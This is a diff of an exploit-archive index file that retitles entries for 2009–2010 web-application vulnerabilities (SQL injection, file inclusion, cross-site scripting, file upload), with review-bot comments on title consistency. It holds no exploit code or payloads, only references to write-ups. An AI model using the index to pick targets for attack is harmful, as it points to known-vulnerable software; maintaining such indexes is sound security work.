 10517,platforms/php/webapps/10517.txt,"Matrimony Script - Cross-Site Request Forgery",2009-12-17,bi0,php,webapps,0
 10520,platforms/asp/webapps/10520.txt,"Active Auction House 3.6 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0
-10522,platforms/php/webapps/10522.txt,"Pre Job Board 1.0 - SQL Bypass",2009-12-17,bi0,php,webapps,0
+10522,platforms/php/webapps/10522.txt,"Pre Job Board 1.0 - SQL Authentication Bypass",2009-12-17,bi0,php,webapps,0
 10523,platforms/php/webapps/10523.txt,"Uploader by CeleronDude 5.3.0 - Arbitrary File Upload (1)",2009-12-17,Stink,php,webapps,0
-10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET - SQL Bypass",2009-12-17,bi0,asp,webapps,0
+10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET - SQL Authentication Bypass",2009-12-17,bi0,asp,webapps,0
 10526,platforms/asp/webapps/10526.txt,"ActiveBuyandSell 6.2 - (buyersend.asp catid) Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0
 10527,platforms/php/webapps/10527.txt,"ReVou Software - SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0
 10528,platforms/php/webapps/10528.txt,"V.H.S. Booking - (hotel_habitaciones.php HotelID) SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0
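Review bot: The new titles for 10522 and 10525 (`Pre Job Board 1.0 - SQL Authentication Bypass`, `Pre Jobo .NET - SQL Authentication Bypass`) do not follow the form the rest of the index uses for what looks like the same class of issue, e.g. `SitePal 1.1 - (Authentication Bypass) SQL Injection` for 10465. Because the word "Injection" is absent, a title search for "SQL Injection" over this index will skip both rows, which matters to anyone using the index to check whether software they run has a published issue. The referenced .txt files are not part of this hunk, so this is an inference from the titles; if they do describe SQL-injection login bypasses, `Pre Job Board 1.0 - (Authentication Bypass) SQL Injection` and `Pre Jobo .NET - (Authentication Bypass) SQL Injection` would keep the rows consistent.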
@@ -22196,7 +22199,7 @@ id,file,description,date,author,platform,type,port
 11005,platforms/asp/webapps/11005.txt,"KMSoft Guestbook 1.0 - Database Disclosure",2010-01-04,LionTurk,asp,webapps,0
 11008,platforms/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 - Database Download",2010-01-05,indoushka,asp,webapps,0
 11012,platforms/php/webapps/11012.txt,"ITaco Group ITaco.biz - (view_news) SQL Injection",2010-01-06,Err0R,php,webapps,0
-11013,platforms/php/webapps/11013.txt,"PHPDirector Game Edition 0.1 - (Local File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-01-06,"Zer0 Thunder",php,webapps,0
+11013,platforms/php/webapps/11013.txt,"PHPDirector Game Edition 0.1 - Local File Inclusion / SQL Injection / Cross-Site Scripting",2010-01-06,"Zer0 Thunder",php,webapps,0
 11014,platforms/php/webapps/11014.txt,"Myuploader - Arbitrary File Upload",2010-01-06,S2K9,php,webapps,0
 11015,platforms/asp/webapps/11015.txt,"Lebi soft Ziyaretci Defteri 7.5 - Database Download",2010-01-06,indoushka,asp,webapps,0
 11016,platforms/asp/webapps/11016.txt,"Net Gitar Shop 1.0 - Database Download",2010-01-06,indoushka,asp,webapps,0
@@ -22242,12 +22245,12 @@ id,file,description,date,author,platform,type,port
 11098,platforms/asp/webapps/11098.txt,"E-membres 1.0 - Remote Database Disclosure",2010-01-10,ViRuSMaN,asp,webapps,0
 11101,platforms/hardware/webapps/11101.txt,"Multiple D-Link Routers - Authentication Bypass",2010-01-10,"SourceSec DevTeam",hardware,webapps,0
 11104,platforms/php/webapps/11104.txt,"CMScontrol 7.x - Arbitrary File Upload",2010-01-11,Cyber_945,php,webapps,0
-11107,platforms/php/webapps/11107.txt,"gridcc script 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-01-11,Red-D3v1L,php,webapps,0
+11107,platforms/php/webapps/11107.txt,"gridcc script 1.0 - SQL Injection / Cross-Site Scripting",2010-01-11,Red-D3v1L,php,webapps,0
 11110,platforms/php/webapps/11110.txt,"Image Hosting Script - Arbitrary File Upload",2010-01-11,R3d-D3V!L,php,webapps,0
 11111,platforms/php/webapps/11111.txt,"FAQEngine 4.24.00 - Remote File Inclusion",2010-01-11,kaMtiEz,php,webapps,0
 11113,platforms/php/webapps/11113.txt,"tincan ltd - (section) SQL Injection",2010-01-11,ALTBTA,php,webapps,0
 11116,platforms/php/webapps/11116.html,"Alwjeez Script - Database Backup",2010-01-11,alnjm33,php,webapps,0
-11120,platforms/php/webapps/11120.txt,"Layout CMS 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0
+11120,platforms/php/webapps/11120.txt,"Layout CMS 1.0 - SQL Injection / Cross-Site Scripting",2010-01-12,Red-D3v1L,php,webapps,0
 11124,platforms/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-13,h00die,php,webapps,0
 11126,platforms/php/webapps/11126.txt,"Populum 2.3 - SQL Injection",2010-01-13,SiLeNtp0is0n,php,webapps,80
 11127,platforms/php/webapps/11127.txt,"Hesk Help Desk 2.1 - Cross-Site Request Forgery",2010-01-13,The.Morpheus,php,webapps,80
@@ -22287,7 +22290,7 @@ id,file,description,date,author,platform,type,port
 11218,platforms/multiple/webapps/11218.txt,"jQuery Uploadify 2.1.0 - Arbitrary File Upload",2010-01-21,k4cp3r/Ablus,multiple,webapps,0
 11222,platforms/php/webapps/11222.txt,"Joomla! Component com_gameserver - SQL Injection",2010-01-22,B-HUNT3|2,php,webapps,0
 11223,platforms/php/webapps/11223.txt,"Joomla! Component com_avosbillets - SQL Injection",2010-01-22,snakespc,php,webapps,0
-11224,platforms/php/webapps/11224.txt,"KosmosBlog 0.9.3 - (SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2010-01-22,"Milos Zivanovic",php,webapps,0
+11224,platforms/php/webapps/11224.txt,"KosmosBlog 0.9.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2010-01-22,"Milos Zivanovic",php,webapps,0
 11225,platforms/php/webapps/11225.txt,"Joomla! Component com_gurujibook - SQL Injection",2010-01-22,snakespc,php,webapps,0
 11226,platforms/php/webapps/11226.txt,"Joomla! Component com_biographies - SQL Injection",2010-01-22,snakespc,php,webapps,0
 11235,platforms/php/webapps/11235.txt,"magic-portal 2.1 - SQL Injection",2010-01-23,alnjm33,php,webapps,0
@@ -22406,7 +22409,7 @@ id,file,description,date,author,platform,type,port
 11431,platforms/php/webapps/11431.txt,"MRW PHP Upload - Arbitrary File Upload",2010-02-13,Phenom,php,webapps,0
 11434,platforms/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,php,webapps,0
 11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 - (orderlinks) SQL Injection",2010-02-13,Gamoscu,php,webapps,0
-11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - (Database Backup Dump / Local File Inclusion) Multiple Vulnerabilities",2010-02-13,ViRuSMaN,php,webapps,0
+11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion",2010-02-13,ViRuSMaN,php,webapps,0
 11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0
 11441,platforms/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0
 11442,platforms/php/webapps/11442.txt,"PEAR 1.9.0 - Multiple Remote File Inclusion",2010-02-14,eidelweiss,php,webapps,0
@@ -22417,7 +22420,7 @@ id,file,description,date,author,platform,type,port
 11447,platforms/php/webapps/11447.txt,"Joomla! Component Jw_allVideos - Arbitrary File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0
 11449,platforms/php/webapps/11449.txt,"Joomla! Component com_videos - SQL Injection",2010-02-14,snakespc,php,webapps,0
 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Exploit",2010-02-14,ROOT_EGY,php,webapps,0
-11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0
+11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Remote File Inclusion / SQL Injection",2010-02-14,kaMtiEz,php,webapps,0
 11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0
 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) - SQL Injection",2010-02-15,10n1z3d,php,webapps,0
 11458,platforms/php/webapps/11458.txt,"WordPress Plugin Copperleaf Photolog 0.16 - SQL Injection",2010-02-15,kaMtiEz,php,webapps,0
@@ -22446,7 +22449,7 @@ id,file,description,date,author,platform,type,port
 11490,platforms/php/webapps/11490.txt,"PunBBAnnuaire 0.4 - Blind SQL Injection",2010-02-17,Metropolis,php,webapps,0
 11494,platforms/php/webapps/11494.txt,"Joomla! Component com_otzivi - Local File Inclusion",2010-02-18,AtT4CKxT3rR0r1ST,php,webapps,0
 11495,platforms/php/webapps/11495.txt,"CubeCart - 'index.php' SQL Injection",2010-02-18,AtT4CKxT3rR0r1ST,php,webapps,0
-11496,platforms/php/webapps/11496.txt,"Open Source Classifieds 1.1.0 - Alpha (OSClassi) Multiple Vulnerabilities",2010-02-18,"Sioma Labs",php,webapps,0
+11496,platforms/php/webapps/11496.txt,"Open Source Classifieds 1.1.0 Alpha (OSClassi) - SQL Injection / Cross-Site Scripting / Arbitrary Admin Change",2010-02-18,"Sioma Labs",php,webapps,0
 11498,platforms/php/webapps/11498.txt,"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion",2010-02-18,"S2 Crew",php,webapps,0
 11502,platforms/php/webapps/11502.txt,"phpAutoVideo - Cross-Site Request Forgery",2010-02-19,GoLdeN-z3r0,php,webapps,0
 11503,platforms/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,php,webapps,0
@@ -22501,7 +22504,7 @@ id,file,description,date,author,platform,type,port
 11585,platforms/php/webapps/11585.txt,"phpCDB 1.0 - Local File Inclusion",2010-02-27,cr4wl3r,php,webapps,0
 11586,platforms/php/webapps/11586.txt,"phpRAINCHECK 1.0.1 - SQL Injection",2010-02-27,cr4wl3r,php,webapps,0
 11587,platforms/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusion",2010-02-27,cr4wl3r,php,webapps,0
-11588,platforms/php/webapps/11588.txt,"phpMySite - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2010-02-27,Crux,php,webapps,0
+11588,platforms/php/webapps/11588.txt,"phpMySite - Cross-Site Scripting / SQL Injection",2010-02-27,Crux,php,webapps,0
 11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings - SQL Injection",2010-02-27,Crux,asp,webapps,0
 11592,platforms/php/webapps/11592.txt,"Scripts Feed Business Directory - SQL Injection",2010-02-27,Crux,php,webapps,0
 11593,platforms/php/webapps/11593.txt,"Uiga Fan Club 1.0 - (Authentication Bypass) SQL Injection",2010-02-27,cr4wl3r,php,webapps,0
@@ -22639,7 +22642,7 @@ id,file,description,date,author,platform,type,port
 11805,platforms/php/webapps/11805.txt,"phpscripte24 Niedrig Gebote Pro Auktions System II - Blind SQL Injection",2010-03-18,"Easy Laster",php,webapps,0
 11806,platforms/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,cr4wl3r,php,webapps,0
 11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Inclusion",2010-03-18,cr4wl3r,php,webapps,0
-11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0
+11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - SQL Injection / Cross-Site Scripting",2010-03-19,Red-D3v1L,php,webapps,0
 11811,platforms/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php Exploit",2010-03-19,"Easy Laster",php,webapps,0
 11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multiple Cross-Site Request Forgerys",2010-03-19,K053,php,webapps,0
 11814,platforms/php/webapps/11814.txt,"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0
@@ -22763,7 +22766,7 @@ id,file,description,date,author,platform,type,port
 12015,platforms/php/webapps/12015.txt,"Joomla! Component 'com_menu' - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
 12016,platforms/php/webapps/12016.txt,"Joomla! Component com_ops - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
 12017,platforms/php/webapps/12017.txt,"Joomla! Component com_football - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
-12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0
+12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - popup.php / counter.php Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0
 12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion",2010-04-02,cr4wl3r,php,webapps,0
 12021,platforms/php/webapps/12021.txt,"68kb 68KB Base 1.0.0rc3 - Cross-Site Request Forgery (Admin)",2010-04-02,"Jelmer de Hen",php,webapps,0
 12022,platforms/php/webapps/12022.txt,"68KB Knowledge Base 1.0.0rc3 - Cross-Site Request Forgery (Edit Main Settings)",2010-04-02,"Jelmer de Hen",php,webapps,0
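Review bot: The new title for 12018, `DynPG CMS 4.1.0 - popup.php / counter.php Multiple Vulnerabilities`, leaves the affected file names unquoted, whereas the same commit single-quotes them in other rows (`'popup_slideshow.php'` for 12732, `'tmssql.php'` for 1651). Suggest `DynPG CMS 4.1.0 - 'popup.php' / 'counter.php' Multiple Vulnerabilities`, so that anything matching titles on a quoted file name treats the three rows alike. It also still ends in the generic "Multiple Vulnerabilities" that the rest of the commit replaces with the named issue classes; the referenced file is not visible here, so which classes apply would need to be taken from it.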
@@ -22799,7 +22802,7 @@ id,file,description,date,author,platform,type,port
 12068,platforms/php/webapps/12068.txt,"Joomla! Component LoginBox - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
 12069,platforms/php/webapps/12069.txt,"Joomla! Component 'com_bca-rss-syndicator' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
 12070,platforms/php/webapps/12070.txt,"Joomla! Component Magic Updater - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
-12071,platforms/php/webapps/12071.txt,"jevoncms - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities",2010-04-05,eidelweiss,php,webapps,0
+12071,platforms/php/webapps/12071.txt,"jevoncms - Local File Inclusion / Remote File Inclusion",2010-04-05,eidelweiss,php,webapps,0
 12075,platforms/php/webapps/12075.txt,"LionWiki 3.x - 'index.php' Arbitrary File Upload",2010-04-05,ayastar,php,webapps,0
 12076,platforms/php/webapps/12076.pl,"ilchClan 1.0.5 - 'cid' SQL Injection",2010-04-05,"Easy Laster",php,webapps,0
 12077,platforms/php/webapps/12077.txt,"Joomla! Component News Portal 1.5.x - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0
@@ -22922,7 +22925,7 @@ id,file,description,date,author,platform,type,port
 12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0
 12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0
 12257,platforms/php/webapps/12257.txt,"Joomla! Component 'com_manager' 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
-12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2010-04-16,JosS,php,webapps,0
+12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps,0
 12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - (Authentication Bypass) SQL Injection",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0
 12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0
 12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
@@ -23237,7 +23240,7 @@ id,file,description,date,author,platform,type,port
 12729,platforms/php/webapps/12729.txt,"Blox CMS - SQL Injection",2010-05-24,CoBRa_21,php,webapps,0
 12730,platforms/multiple/webapps/12730.txt,"ProWeb Design - SQL Injection",2010-05-24,cyberlog,multiple,webapps,0
 12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection",2010-05-24,ByEge,php,webapps,0
-12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0
+12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - 'popup_slideshow.php' Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0
 12734,platforms/asp/webapps/12734.txt,"Blaze Apps - Multiple Vulnerabilities",2010-05-24,AmnPardaz,asp,webapps,0
 12735,platforms/php/webapps/12735.txt,"Nitro Web Gallery - SQL Injection",2010-05-25,cyberlog,php,webapps,0
 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - 'news.php' SQL Injection",2010-05-25,"Dr.SiLnT HilL",php,webapps,0
@@ -23254,7 +23257,7 @@ id,file,description,date,author,platform,type,port
 12761,platforms/php/webapps/12761.txt,"GlobalWebTek Design - SQL Injection",2010-05-27,cyberlog,php,webapps,0
 12763,platforms/php/webapps/12763.txt,"File Share scriptFile share - SQL Injection",2010-05-27,MouDy-Dz,php,webapps,0
 12766,platforms/php/webapps/12766.txt,"PPhlogger 2.2.5 - (trace.php) Remote Command Execution",2010-05-27,"Sn!pEr.S!Te Hacker",php,webapps,0
-12767,platforms/php/webapps/12767.txt,"parlic Design - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0
+12767,platforms/php/webapps/12767.txt,"parlic Design - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-27,XroGuE,php,webapps,0
 12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script - SQL Injection",2010-05-27,Mr.P3rfekT,php,webapps,0
 12769,platforms/php/webapps/12769.txt,"Joomla! Component 'com_mediqna' 1.1 - Local File Inclusion",2010-05-27,kaMtiEz,php,webapps,0
 12770,platforms/php/webapps/12770.txt,"toronja CMS - SQL Injection",2010-05-27,cyberlog,php,webapps,0
@@ -23273,7 +23276,7 @@ id,file,description,date,author,platform,type,port
 12788,platforms/php/webapps/12788.txt,"Marketing Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0
 12790,platforms/php/webapps/12790.txt,"Nucleus Plugin Twitter - Remote File Inclusion",2010-05-29,AntiSecurity,php,webapps,0
 12791,platforms/php/webapps/12791.txt,"Aim Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0
-12792,platforms/php/webapps/12792.txt,"MileHigh Creative - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0
+12792,platforms/php/webapps/12792.txt,"MileHigh Creative - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-29,XroGuE,php,webapps,0
 12793,platforms/php/webapps/12793.txt,"Cosmos Solutions CMS - SQL Injection",2010-05-29,cyberlog,php,webapps,0
 12794,platforms/php/webapps/12794.txt,"Cosmos Solutions CMS - (id= / page=) SQL Injection",2010-05-29,gendenk,php,webapps,0
 12796,platforms/php/webapps/12796.txt,"Joomla! Component BF Quiz 1.0 - SQL Injection (2)",2010-05-29,"Valentin Hoebel",php,webapps,0
@@ -23289,7 +23292,7 @@ id,file,description,date,author,platform,type,port
 12812,platforms/php/webapps/12812.txt,"Joomla! Component 'com_quran' - SQL Injection",2010-05-30,r3m1ck,php,webapps,0
 12813,platforms/php/webapps/12813.txt,"WsCMS - Multiple SQL Injections",2010-05-31,cyberlog,php,webapps,0
 12814,platforms/php/webapps/12814.txt,"Joomla! Component 'com_g2bridge' - Local File Inclusion",2010-05-31,akatsuchi,php,webapps,0
-12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - (Source Code Disclosure) Multiple Vulnerabilities",2010-05-31,indoushka,php,webapps,0
+12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - Source Code Disclosure",2010-05-31,indoushka,php,webapps,0
 12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full - Remote File Inclusion / Cross-Site Scripting",2010-05-31,indoushka,php,webapps,0
 12819,platforms/php/webapps/12819.txt,"Persian E107 - Cross-Site Scripting",2010-05-31,indoushka,php,webapps,0
 12820,platforms/php/webapps/12820.txt,"Visitor Logger - 'banned.php' Remote File Inclusion",2010-05-31,bd0rk,php,webapps,0
@@ -23490,7 +23493,7 @@ id,file,description,date,author,platform,type,port
 13990,platforms/asp/webapps/13990.txt,"Boat Classifieds - SQL Injection",2010-06-22,Sangteamtham,asp,webapps,0
 13991,platforms/php/webapps/13991.txt,"Softbiz PHP FAQ Script - Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0
 13992,platforms/php/webapps/13992.txt,"Pre PHP Classifieds - SQL Injection",2010-06-22,Sangteamtham,php,webapps,0
-13993,platforms/php/webapps/13993.txt,"K-Search - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0
+13993,platforms/php/webapps/13993.txt,"K-Search - SQL Injection / Cross-Site Scripting",2010-06-22,Sangteamtham,php,webapps,0
 14512,platforms/php/webapps/14512.txt,"Concept E-Commerce - SQL Injection",2010-07-31,gendenk,php,webapps,0
 13995,platforms/asp/webapps/13995.txt,"Boat Classifieds - 'printdetail.asp?Id' SQL Injection",2010-06-23,CoBRa_21,asp,webapps,0
 13996,platforms/php/webapps/13996.txt,"Pre Multiple Vendors Shopping Malls - 'products.php?sid' SQL Injection",2010-06-23,CoBRa_21,php,webapps,0
@@ -23675,7 +23678,7 @@ id,file,description,date,author,platform,type,port
 14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
 14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact ORGanizer - SQL Injection",2010-07-10,v3n0m,php,webapps,0
 14327,platforms/php/webapps/14327.txt,"Joomla! Component 'Rapid-Recipe' - Persistent Cross-Site Scripting",2010-07-10,Sid3^effects,php,webapps,0
-14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
+14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-11,10n1z3d,php,webapps,0
 14329,platforms/php/webapps/14329.html,"Frog CMS 0.9.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
 14330,platforms/php/webapps/14330.html,"TomatoCart 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
 14331,platforms/php/webapps/14331.html,"TomatoCMS 2.0.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
@@ -23813,7 +23816,7 @@ id,file,description,date,author,platform,type,port
 14644,platforms/php/webapps/14644.html,"Saurus CMS Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-14,"Fady Mohammed Osman",php,webapps,0
 14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - (news_id) SQL Injection",2010-08-14,LiquidWorm,php,webapps,0
 14647,platforms/php/webapps/14647.php,"PHP-Fusion - Local File Inclusion",2010-08-15,MoDaMeR,php,webapps,0
-14648,platforms/php/webapps/14648.txt,"Guestbook Script PHP - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0
+14648,platforms/php/webapps/14648.txt,"Guestbook Script PHP - Cross-Site Scripting / HTML Injection",2010-08-15,"AnTi SeCuRe",php,webapps,0
 14650,platforms/php/webapps/14650.html,"Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-15,10n1z3d,php,webapps,0
 14654,platforms/php/webapps/14654.php,"CMSQLite 1.2 / CMySQLite 1.3.1 - Remote Code Execution",2010-08-15,BlackHawk,php,webapps,0
 14655,platforms/php/webapps/14655.txt,"Joomla! Component 'com_equipment' - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0
@@ -23856,7 +23859,7 @@ id,file,description,date,author,platform,type,port
 14827,platforms/php/webapps/14827.py,"Blogman 0.7.1 - 'profile.php' SQL Injection",2010-08-28,"Ptrace Security",php,webapps,0
 14829,platforms/php/webapps/14829.txt,"CF Image Hosting Script 1.3 - (settings.cdb) Information Disclosure",2010-08-28,Dr.$audi,php,webapps,0
 14833,platforms/php/webapps/14833.txt,"vBulletin 3.8.4 / 3.8.5 - Registration Bypass",2010-08-29,"Immortal Boy",php,webapps,0
-14834,platforms/php/webapps/14834.txt,"Max's Guestbook - (HTML Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-08-29,"MiND C0re",php,webapps,0
+14834,platforms/php/webapps/14834.txt,"Max's Guestbook - HTML Injection / Cross-Site Scripting",2010-08-29,"MiND C0re",php,webapps,0
 14835,platforms/php/webapps/14835.txt,"Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusion",2010-08-29,JosS,php,webapps,0
 14837,platforms/php/webapps/14837.txt,"CF Image Hosting Script 1.3.8 - Remote File Inclusion",2010-08-29,"FoX HaCkEr",php,webapps,0
 14838,platforms/php/webapps/14838.txt,"Seagull 0.6.7 - SQL Injection",2010-08-29,Sweet,php,webapps,0
@@ -23967,7 +23970,7 @@ id,file,description,date,author,platform,type,port
 15124,platforms/asp/webapps/15124.txt,"ndCMS - SQL Injection",2010-09-27,Abysssec,asp,webapps,0
 15126,platforms/php/webapps/15126.txt,"Entrans - SQL Injection",2010-09-27,keracker,php,webapps,0
 15130,platforms/cgi/webapps/15130.sh,"Barracuda Networks Spam & Virus Firewall 4.1.1.021 - Remote Configuration Retrieval",2010-09-27,ShadowHatesYou,cgi,webapps,0
-15128,platforms/win_x86/webapps/15128.txt,"Allpc 2.5 osCommerce - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-09-27,**RoAd_KiLlEr**,win_x86,webapps,80
+15128,platforms/win_x86/webapps/15128.txt,"Allpc 2.5 osCommerce - SQL Injection / Cross-Site Scripting",2010-09-27,**RoAd_KiLlEr**,win_x86,webapps,80
 15198,platforms/php/webapps/15198.txt,"Aprox CMS Engine 6.0 - Multiple Vulnerabilities",2010-10-03,"Stephan Sattler",php,webapps,0
 15135,platforms/php/webapps/15135.txt,"Car Portal 2.0 - Blind SQL Injection",2010-09-27,**RoAd_KiLlEr**,php,webapps,0
 15143,platforms/php/webapps/15143.txt,"e107 0.7.23 - SQL Injection",2010-09-28,"High-Tech Bridge SA",php,webapps,0
@@ -23997,7 +24000,7 @@ id,file,description,date,author,platform,type,port
 15177,platforms/php/webapps/15177.pl,"iGaming CMS 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0
 15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Persistent Cross-Site Scripting",2010-10-02,sqlhacker,asp,webapps,0
 15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x - (7.2.3925) LDAP Injection",2010-10-02,sqlhacker,asp,webapps,0
-15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-10-02,KnocKout,asp,webapps,0
+15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret - SQL Injection / Cross-Site Scripting",2010-10-02,KnocKout,asp,webapps,0
 15194,platforms/php/webapps/15194.txt,"TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload",2010-10-03,Hackeri-AL,php,webapps,0
 15200,platforms/php/webapps/15200.txt,"FAQMasterFlex 1.2 - SQL Injection",2010-10-04,cyb3r.anbu,php,webapps,0
 15204,platforms/php/webapps/15204.txt,"DNET Live-Stats 0.8 - Local File Inclusion",2010-10-04,blake,php,webapps,0
@@ -24005,7 +24008,7 @@ id,file,description,date,author,platform,type,port
 15207,platforms/php/webapps/15207.txt,"Uebimiau Webmail 3.2.0-2.0 - Local File Inclusion",2010-10-04,blake,php,webapps,0
 15208,platforms/php/webapps/15208.txt,"CuteNews - 'page' Parameter Local File Inclusion",2010-10-05,eidelweiss,php,webapps,0
 15209,platforms/php/webapps/15209.txt,"SPAW Editor 2.0.8.1 - Local File Inclusion",2010-10-05,"soorakh kos",php,webapps,0
